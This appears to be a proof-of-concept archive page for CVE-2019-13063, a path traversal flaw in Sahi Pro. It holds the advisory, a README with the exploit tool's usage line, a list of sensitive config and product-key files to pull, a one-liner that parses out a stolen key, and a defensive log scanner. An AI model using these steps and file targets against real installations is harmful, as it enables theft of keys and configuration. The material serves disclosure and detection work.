CVE-2019-13063 PoC — Tyto Software Sahi Pro Path Traversal Vulnerability

Source
Associated Vulnerability
Title: Tyto Software Sahi Pro Path Traversal Vulnerability (CVE-2019-13063)
Description: Within Sahi Pro 8.0.0, an attacker can send a specially crafted URL to include any victim files on the system via the script parameter on the Script_view page. This will result in file disclosure (i.e., being able to pull any file from the remote victim application). This can be used to steal and obtain sensitive config and other files. This can result in complete compromise of the application. The script parameter is vulnerable to directory traversal and both local and remote file inclusion.
Description
Proof of concept tool to exploit the directory traversal and local file inclusion vulnerability that resides in the Sahi-pro web application (CVE-2019-13063).
Readme
# CVE-2019-13063 Proof of concept
![Python 3](https://img.shields.io/badge/python-3.6-blue.svg)

## About

An issue was discovered in the Sahi-pro script manager web application: a file and directory traversal vulnerability in the `?script=` parameter on the `/Script_view` page. An attacker can send a specially crafted URL to retrieve and steal sensitive files from the victim.

This is a proof of concept tool to exploit the directory traversal and file traversal vulnerability that resides in the Sahi-pro web application.

**Impact:** Within the Sahi-pro web application software, there is a directory and file traversal vulnerability which results in the leakage of sensitive information from the application, or which can be used to pull system files directly.

The ?script= parameter on the script_view page is susceptible to file and directory traversal to list the contents of files.

## Usage

Run it like this:
`$ python3 CVE-2019-13063-POC.py --url http://example:[REDACTED]`
*This will download the application's product key.*

Specify the full URL, including the file you wish to download appended to the vulnerable ?script= parameter.

```
usage: CVE-2019-13063-POC.py [-h] [--url URL]

optional arguments:
  -h, --help  show this help message and exit
  --url URL   Specify the vulnerable URL

```

## Sensitive files which may lead to direct application compromise

```
Sahi User properties file - \sahi_pro\userdata\config\userdata.properties
Sahi data profile - \sahi_pro\userdata\browser\ff\profiles\sahi0\prefs.js
Sahi properties file - \sahi_pro\config\sahi.properties
Sahi Product key location - \config\productkey.txt
```
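
A defender-side check for the pattern described above, as an added example that is not part of the original README or PoC: it scans web access logs for `/Script_view` requests whose `script` parameter contains a traversal sequence, a remote URL, or one of the file names listed above. The log format, sample lines and function names are constructed for illustration, and the request path prefix on a real Sahi Pro install is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# File names from the README's list of sensitive Sahi Pro files.
SENSITIVE_NAMES = {"userdata.properties", "prefs.js", "sahi.properties", "productkey.txt"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Constructed sample access-log lines (not real traffic; the URL prefix is assumed).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2019:10:00:00 +0000] "GET /Script_view?script=demo/login.sah HTTP/1.1" 200 512
10.0.0.9 - - [01/Jul/2019:10:00:05 +0000] "GET /Script_view?script=..%2F..%2Fconfig%2Fproductkey.txt HTTP/1.1" 200 301
10.0.0.9 - - [01/Jul/2019:10:00:07 +0000] "GET /Script_view?script=%252e%252e%255cconfig%255csahi.properties HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jul/2019:10:00:09 +0000] "GET /index.htm?script=../x HTTP/1.1" 404 0
"""

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so %252e%252e is still seen as '..'."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(script_value):
    """Return the reasons a script= value looks like abuse (empty list if none)."""
    v = decode_fully(script_value).replace("\\", "/").lower()
    parts = v.split("/")
    reasons = []
    if ".." in parts:
        reasons.append("traversal")
    if re.match(r"[a-z][a-z0-9+.-]*://", v):
        reasons.append("remote-url")
    if parts[-1] in SENSITIVE_NAMES:
        reasons.append("sensitive-file")
    return reasons

def scan(log_text):
    """Return (line_number, reasons) for each suspicious Script_view request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.lower().endswith("/script_view"):
            continue
        for value in parse_qs(url.query).get("script", []):
            if reasons := classify(value):
                findings.append((lineno, reasons))
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The status code and response size on flagged lines help triage: a 200 with a body on a `sensitive-file` hit means the file was likely served.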

## Other 

This script will just attempt to download the entire page. You could easily parse out the wanted content with a simple bash one-liner, since it sits between the unique `<ol><li>` HTML tags.
  
Example to parse out the product key: 
 
```
cat output.txt | grep "<ol><li>" | cut -d ">" -f3 | cut -d "<" -f1

1a79a4d60de6718e8e5b326e338ae533
```
File Snapshot

```
[4.0K] /data/pocs/cb97aeaa9bb6e6bd1b70a638bb863a5d40bff95c
├── [ 888] CVE-2019-13063-POC.py
├── [ 34K] LICENSE
├── [2.0K] README.md
└── [ 9] requirements.txt

0 directories, 4 files
```